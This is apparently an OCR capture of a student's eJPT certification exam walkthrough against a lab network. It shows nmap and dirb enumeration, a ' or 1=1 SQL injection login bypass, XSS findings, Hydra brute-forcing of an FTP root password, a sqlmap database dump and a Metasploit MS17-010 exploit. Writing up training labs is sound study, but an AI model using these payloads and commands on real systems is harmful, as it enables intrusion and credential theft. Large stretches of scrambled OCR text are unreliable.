2728122, 758 PM ‘JP Exam WalkthoughvWiteup - Evernote eJPT Exam Walkthrough/Writeup Report - Methodologies Report - Information Gathering The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, I was tasked with exploiting the exam network. The specific IP addresses were: Exam Network Given host target: 192.168.193.211 -/omapAutomator.sh --host 192.168.193.211 -t network Except the attacker machine, 3 other nodes (hosts) have been found using nmapAutomator: 192.168.193.212, 192.168.193.85 and 192.168.193.4 , AFTP server can also be found at 192.168.193.14 Given the materials, we have a PCAP that shall be open and analysed Preret mn storeary Fe Hedin sw [on spa an tae Yee hk Fam Taleb Tew ——— Ce ————————— Se 3.2 Report - Service Enumeration ‘Summary of open ports for each net 192.168.193.211 »_web_nav_VO08login=true#2n=aeSdd620-8640-b317-e5-SO87HCISI2488 1/13‘edPT Exam WalktroughiW Not shown: 997 closed tcp ports (reset) Cetra Neocr ce ee rea aCe Oye ae ee eee eee Cee) Crea Ue ote Oe ur ener ee Peano) ge ote aie peter iets eee L arn yP re SEL altel SLT ELE ST seet erat ares emetic ea BO ee ren ea ree ree Peer eee CO Brae ea Tes ee Oot eee aa Pistad ect ne ect yey 192.168.193.212 has same open ports and running services while 192.168,193.4 only has ftp open. further checked both 192.168.2x machines for SMB enumaration using smb jessica and kirk, as well as drives present on that machines: Mee en cL yee eC eee SE fenras CaP aey k pila CCB a ni ee ciestls cy Pag meae rd Bk a Peemieae rad roan} CemearC at c§ Peerieee rad Conus eae MC ee eesti Paes eens races} Crease ent, that pointed out two users, web?referalSpecifir=mkigropat in ruoH?n=aeidd620-2640-P317-{405-5987d‘JP Exam WalkthcoughvWteup - Evernote Praesent et ere Tce ees) Ere enosse see rcnetetstere meer aes ww overnal _nav_VOOBlogin=t dd620-8640-972728122, 758 PM ‘dP Exam WalkthzoughvWiteup - Evernote Going back to analysing the given PCAP file, it seems that once we request the port 80 on a network machine we're redirected to 10.86.74.7 Having to rebuild this environment's behaviour from our attacker machine: sudo ip route add 10.86.74,0/24 via 192,168,193.4 && traceroute 10.86.74.7 sudo ip route flush 10.86.74.0/24 sudo ip route add 10.86.74,0/24 via 192,168,193.4 && traceroute 10.86.74.7 This can also be done with 10.85.174.0/24 hitps:hww. vernate.comieliontiweb?referalSpecifier=mkigrepack.en_oo_web_nav_VOOBlogin=irueW7n=ae5dd620-8640-b317(é05-5987dc1532488 4/13‘0JPT Exam WalktizoughyWteup Evernote Ca Contact Us Latest Albums nae comets Pa oe ri oma Ce ee rUwob?referralSpector=mkigrop‘edPT Exam WalktroughiW ee eee eon On Contact page we can see details about Mick Hughes and other employ /ees as their nicknames and roles. As this is a web service, Dir tool was used for directory enumeration: dirb /usr/share/wordlists/dirb/common.txt we find the old configuration for the backend databases and other fil kigropack.en_< et ¢n=ae5sd620-B640-b317-s5-S087 de 1592488, ena2728122, 758 PM ‘JP Exam WalkthzoughvWteup - Evernote pees mera rae ee ee ae feet ete 3.3 Report - Penetration Vulnerability Exploited: Blind SQLi bypass * Explanation: - Motville login page is vulnerable to blind SQL injection bypassing. © Severity: High © PoC: Se Welcome ' or 1=1-- - Cec CaLat Reed © Steps to exploit: use as username and password Vulnerability Exploited: Stored XSS hips evernote.comialiontwebeferralSpecier=mklgrepack_en_oo_web nav_VOOBlogin=true®n=aeSéd620-8640-0317(455-59B7UC1532488 7/32728122, 758 PM ‘JP Exam WalkthoughvWiteup - Evernote © Explanation: - Motville Contact page is vulnerable to stored Cross-Site Scripting (XSS) © Severity: Medium * PoC: Contact Us See ee eta * Steps to exploit: Issue a POST request on Contact form's name box using a XSS alert inside a script tag, Vulnerability Exploited: Reflected xSS Explanation: - Motville Search parameter/box is vulnerable to reflected Cross-Site Scripting (XSS) Severity: Medium © PoC: © Steps to exploit: Issue a Getrequest on Search parameter/box using a XSS alert inside a script tag. Using Nessus Essensials scanner on the same host revealed a 2nd GET exploitable XSS. hitps:hww.evernote.comieliontiweb?referalSpecifier=mkigrapack_en_oo_web_nav_VOOBlogin=iruet7n=ae5dd620-8640-b317(ée5-5987dc1532488 13758 PM ‘JP Exam WalkthoughvWiteup - Evernote Given the materials. we can use Hydra along the userlist and paswordlist files to bruteforce the FTP's root password and further enumerate files over the server: . The credentials are root:metallica. eee aaa Le EE on : oes Se see et era Strrcic mmm arr eatia) oaded 13 password hashes with 13 different salts (shaS12crypt, crypt(3) $6$ Ey CEaeLL pera iets) Cee eto rte Ca eee ec aed FSR were em Messeee ce eee eae i nme cree at kigropack. en et? In=ae5dd620-B6A0-bH7-e5-S087Ae1532488 9I132728122, 758 PM ‘JP Exam WalkthcoughvWteup - Evernote anim 1 erie (caniel johnson) Qanessinith) eesti 0:00:00:0 5 Eats sion completed. Issued command: Coming bak to Moville, SQL Map tool was used to discover and dump database account details. The iterative process led up to "accounts" table of "motville" database that it's stored to a .csv file by sqlmap for later use. Issued command: sqlmap -u http://10.86/74.7 -D motville -T accounts --columns aa eee TET When completed, resulted output can be found at Further, nmapAutomator was used for complete scanning both machines russing SMB. ./omapAutomator.sh --host 192.168.193.211 -t full -/omapAutomator.sh --host 192.168.193.211 + full Both machines (.211 and .212) that are vulnerable to Blue Logon vulnerability (MS17-010). Metasploit console is helpful in getting privilleged access using this vulnerability. msfeonsole-q > use exploit/windows/smb/ms17_010_psexec > set RHOSTS 192.168.193.211 (or 192.68.193.212 for the second machine) > set LHOST tap > run One of the machines hides a file containing a flag, C:\WINDOWS\secret.txt. 1_09_web_nav_VOOBlogin=trueH?n=aeSed620.8640-b97-f4s5-5987dCI532488 10/19